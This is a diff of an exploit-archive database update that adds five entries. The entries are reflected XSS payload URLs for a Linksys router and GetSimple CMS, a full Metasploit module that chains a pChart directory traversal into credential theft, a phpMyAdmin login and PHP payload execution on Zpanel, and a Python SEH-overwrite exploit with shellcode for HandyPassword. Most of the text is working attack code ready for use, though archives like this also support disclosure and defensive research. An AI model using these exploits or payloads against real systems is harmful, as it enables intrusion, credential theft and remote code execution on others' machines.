DB: 2015-10-22

5 new exploits

files.csv

@@ -34775,3 +34775,8 @@ id,file,description,date,author,platform,type,port
 38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-based Blind SQL Injection Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
 38498,platforms/windows/dos/38498.py,"Elecard MPEG Player '.m3u' File Buffer Overflow Vulnerability",2013-04-27,metacom,windows,dos,0
 38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script Spoofing Vulnerability",2013-04-27,"Jason Whelan",php,webapps,0
+38501,platforms/hardware/remote/38501.txt,"Cisco Linksys E4200 /apply.cgi Multiple Parameter XSS",2013-04-27,"Carl Benedict",hardware,remote,0
+38502,platforms/php/webapps/38502.txt,"GetSimple CMS /admin/edit.php Multiple Parameter XSS",2013-05-01,"High-Tech Bridge",php,webapps,0
+38503,platforms/php/webapps/38503.txt,"GetSimple CMS /admin/filebrowser.php Multiple Parameter XSS",2013-05-01,"High-Tech Bridge",php,webapps,0
+38504,platforms/windows/local/38504.py,"HandyPassword 4.9.3 - SEH Over-Write Exploit",2015-10-21,Un_N0n,windows,local,0
+38505,platforms/php/remote/38505.rb,"Zpanel Remote Unauthenticated RCE",2015-10-21,metasploit,php,remote,0

platforms/hardware/remote/38501.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/59558/info
+
+The Cisco Linksys E1200 N300 router is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Cisco Linksys E1200 N300 running firmware 2.0.04 is vulnerable. 
+
+http://www.example.com/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27
+
+http://www.example.com/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1 

platforms/php/remote/38505.rb

@@ -0,0 +1,292 @@
+require 'msf/core'
+require 'msf/core/exploit/php_exe'
+require 'nokogiri'
+require 'uri'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Zpanel Remote Unauthenticated RCE',
+      'Description'    => %q{
+        This module exploits an information disclosure vulnerability
+        found in Zpanel <= 10.1.0. The vulnerability is due to a
+        vulnerable version of pChart allowing remote, unauthenticated,
+        users to read arbitrary files found on the filesystem. This
+        particular module utilizes this vulnerability to identify the
+        username/password combination of the MySQL instance. With the
+        credentials the attackers can login to PHPMyAdmin and execute
+        SQL commands to drop a malicious payload on the filesystem and
+        call it leading to remote code execution.
+      },
+      'Author' =>
+        [
+          'dawn isabel',
+          'brad wolfe',
+          'brent morris',
+          'james fitts'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2013-2097' ],
+          [ 'EDB', '31173' ],    # pChart
+          [ 'OSVDB', '102595' ], # pChart
+          [ 'URL', 'http://bugs.zpanelcp.com/view.php?id=665' ],
+          [ 'URL', 'http://seclists.org/fulldisclosure/2013/Jun/39' ],
+          [ 'URL', 'http://www.reddit.com/r/netsec/comments/1ee0eg/zpanel_support_team_calls_forum_user_fucken/' ]
+        ],
+      'Payload' =>
+        {
+          'BadChars' => "\x00",
+        },
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
+          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Jan 30 2014'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to Zpanel', '/zpanel'])
+      ], self.class)
+  end
+
+  def get_setting(res, setting_name)
+    n = ::Nokogiri::HTML(res.body)
+    spans = n.search('//code//span//span')
+    found_element = spans.select{ |e| /#{setting_name}/ === e.text }.first
+    val = found_element.next.next.text
+    val.scan(/['"]([[:print:]]+)['"]/).flatten.first || ''
+  end
+
+  def get_user(res)
+    get_setting(res, 'user')
+  end
+
+  def get_passwd(res)
+    get_setting(res, 'pass')
+  end
+
+  def get_dbname(res)
+    get_setting(res, 'dbname')
+  end
+
+  def dot_dot_slash(uri)
+    res = send_request_cgi({
+      'method' =>'GET',
+      'uri' => normalize_uri("#{uri}", 'etc', 'lib', 'pChart2', 'examples', 'index.php'),
+      'vars_get' => {
+        'Action' => 'View',
+        'Script' => '../../../../cnf/db.php'
+      }
+    })
+
+    uname  = get_user(res)
+    passwd = get_passwd(res)
+    dbname = get_dbname(res)
+
+    return uname, passwd, dbname
+  end
+
+  def get_token_from_form(res)
+    hidden_inputs = res.get_hidden_inputs
+    hidden_inputs.first['token']
+  end
+
+  def get_token_from_url(url)
+    u = URI(url)
+    u.query.split('&').each do |param|
+      param_name, param_value = param.scan(/([[:print:]]+)=([[:print:]]+)/).flatten
+      return param_value if param_name == 'token'
+    end
+
+    ''
+  end
+
+  def grab_sess_and_token(uri)
+    print_status('Attempting to get PHPSESSIONID')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri("#{uri}"),
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while attempting to get PHPSESSID')
+    end
+
+    cookies = res.get_cookies
+    sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''
+
+    if sid.length > 0
+      print_good('PHPSESSID identified!')
+      print_good("PHPSESSID = #{sid.split("=")[1]}")
+
+      print_status('Attempting to get CSRF token')
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri'    => normalize_uri("#{uri}", 'etc', 'apps', 'phpmyadmin', 'index.php'),
+        'Cookie' => "#{sid}"
+      })
+
+      unless res
+        fail_with(Failure::Unknown, 'Connection timed out while attempting to get CSRF token')
+      end
+
+      token = get_token_from_form(res)
+      cookies = res.get_cookies
+
+      cookies = cookies.split('; ')
+      cookies = "#{cookies[-1]} #{cookies[1]}; #{cookies[2]}; #{cookies[3]}; #{sid}"
+
+      if token.length > 0
+        print_good('CSRF token identified!')
+        print_good("CSRF token = #{token}")
+        return cookies, token, sid
+      else
+        print_error('CSRF token could not be identified...')
+      end
+    else
+      print_error('PHPSESSID could not be identified...')
+    end
+  end
+
+  def login_phpmyadmin(uri, uname, passwd, cookies, token, sess_id)
+    old_cookies = cookies
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri('etc', 'apps', 'phpmyadmin', 'index.php'),
+      'cookie' => cookies,
+      'ctype'  => 'application/x-www-form-urlencoded',
+      'headers'=>
+        {
+          'Referer' => "http://#{datastore['RHOST']}/etc/apps/phpmyadmin/",
+        },
+      'vars_post' => {
+        'pma_username'         => uname,
+        'pma_password'         => passwd,
+        'server'               => '1',
+        'lang'                 => 'en',
+        'collation_connection' => 'utf8_general_ci',
+        'token'                => token
+      }
+    })
+
+    cookies = "#{res.get_cookies}"
+
+    old_cookies = old_cookies.split("; ")
+    cookies = cookies.split("; ")
+
+    new_cookies =  "#{old_cookies[0]}; "
+    new_cookies << "#{old_cookies[1]}; "
+    new_cookies << "#{old_cookies[2]}; "
+    new_cookies << "#{old_cookies[3]}; "
+    new_cookies << "#{cookies[0]}; "
+    new_cookies << "#{cookies[1]} "
+    new_cookies << "#{sess_id}"
+
+    token = get_token_from_url(res['Location'])
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri('etc', 'apps', 'phpmyadmin', 'index.php'),
+      'Referer'  => "http://#{datastore['RHOST']}/etc/apps/phpmyadmin/",
+      'cookie'   => new_cookies,
+      'vars_get' => {
+        'token' => token
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while attempting to login to phpMyAdmin')
+    end
+
+    if res.code == 200 and res.body.to_s =~ /phpMyAdmin is more friendly with a/
+      print_good('PHPMyAdmin login successful!')
+      return new_cookies, token
+    end
+  end
+
+  def do_sql(cookies, token, uri)
+    fname = "#{rand_text_alpha_upper(5)}.php"
+    sql_stmt = "SELECT \"<?php #{payload.encoded} ?>\" INTO OUTFILE \"/etc/zpanel/panel/#{fname}\""
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri('etc', 'apps', 'phpmyadmin', 'import.php'),
+      'cookie' => cookies,
+      'ctype'  =>'application/x-www-form-urlencoded; charset=UTF-8',
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest',
+        'Referer' => "http://#{datastore['RHOST']}/etc/apps/phpmyadmin/server_sql.php?token=#{token}"
+      },
+      'vars_post' => {
+        'is_js_confirmed' => '0',
+        'token'           => token,
+        'pos'             => '0',
+        'goto'            => 'server_sql.php',
+        'message_to_show' => 'Your+SQL+query+has+been+executed+successfully',
+        'prev_sql_query'  => '',
+        'sql_query'       => sql_stmt,
+        'sql_delimiter'   => ';',
+        'show_query'      => '1',
+        'ajax_request'    => 'true',
+        '_nocache'        => rand.to_s[2..19].to_i
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out when attempting to upload payload')
+    end
+
+    if res.body =~ /"success":true/
+      print_good("'#{fname}' successfully uploaded")
+      print_good("A privilege escalation exploit can be found 'exploits/linux/local/zpanel_zsudo'")
+      print_status("Executing '#{fname}' on the remote host")
+
+      res = send_request_cgi({
+        'method'=>'GET',
+        'uri'=>normalize_uri("#{uri}", "#{fname}")
+      })
+    else
+      print_error("#{res.body.to_s}")
+    end
+  end
+
+  def exploit
+    # Checking pChart
+    res = send_request_cgi({
+      'method'=> 'GET',
+      'uri'=> normalize_uri("#{datastore['URI']}", 'etc', 'lib', 'pChart2', 'examples', 'index.php')
+    })
+
+    # if pChart is vuln version
+    if res.body =~ /pChart 2\.x/
+      uname, passwd, db_name = dot_dot_slash("#{datastore['URI']}")
+      if uname.length > 0 && passwd.length > 0
+        print_good('Directory traversal successful, Username/Password identified!')
+        print_good("Username: #{uname}")
+        print_good("Password: #{passwd}")
+        print_good("DB Name: #{db_name}")
+        cookies, token, sess_id = grab_sess_and_token("#{datastore['URI']}")
+        print_status('Logging into PHPMyAdmin now')
+        cookies, token = login_phpmyadmin("#{datastore['URI']}", uname, passwd, cookies, token, sess_id)
+        print_status('Uploading malicious payload now')
+        do_sql(cookies, token, "#{datastore['URI']}")
+      else
+        print_error('It appears that the directory traversal was unsuccessful...')
+      end
+    else
+      print_error("It appears that the version of pChart is not vulnerable...")
+    end
+  end
+end

platforms/php/webapps/38502.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/59600/info
+
+GetSimple CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+GetSimple CMS 3.1.2 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/admin/edit.php?title="><scri<script></script>pt>alert(document.cookie);</scri<script>< /script>pt>
+http://www.example.com/admin/edit.php?menu="><scri<script></script>pt>alert(document.cookie);</scri<script></ script>pt> 

platforms/php/webapps/38503.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/59600/info
+ 
+GetSimple CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ 
+GetSimple CMS 3.1.2 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/admin/filebrowser.php?path="><scri<script></script>pt>alert(document.cookie);</scri<sc ript></script>pt>
+http://www.example.com/admin/filebrowser.php?returnid="><scri<script></script>pt>alert(document.cookie);</scr i<script></script>pt> 

platforms/windows/local/38504.py

@@ -0,0 +1,49 @@
+'''
+********************************************************************************************
+# Exploit Title: HandyPassword SEH-Over Write Exploit
+# Date: 9/24/2015
+# Exploit Author: Un_N0n
+# Software Link: http://www.handypassword.com/download.shtml
+# Version: 4.9.3
+# Tested on: Windows 7 x86(32 BIT)
+********************************************************************************************
+
+[Steps to Produce the Crash]:
+1- open 'HandyPassword.exe'.
+2- Then From Menu Goto New Card->Simple Login Form.
+3- Click on Create Card, Enter the contents of 'Exploit.txt' Created by script in the Title Field.
+4- Enter Short Random value in the rest of the fields.
+5- Click on OK
+~ Calculator will appear and Software will Crash.
+
+[Code to produce Exploit]: 
+'''
+
+junk = "A"*1144
+
+nseh = "\xeb\x06\x90\x90" #JMP 6bytes
+jmp ="\xB3\x27\x2F\x7F"  #0x7f2f27b3 From 
+
+nops = "\x90"*50
+shellcode = ("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
+"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
+"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
+"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
+"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
+"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
+"\x45\x81\x3e\x43\x72\x65\x61\x75"
+"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
+"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
+"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
+"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
+"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
+"\x6c\x63\x89\xe2\x52\x52\x53\x53"
+"\x53\x53\x53\x53\x52\x53\xff\xd7");
+junk2 = "D"*2000
+
+file = open("exploit.txt",'w')
+file.write(junk+nseh+jmp+nops+shellcode+junk2)
+file.close()
+
+
+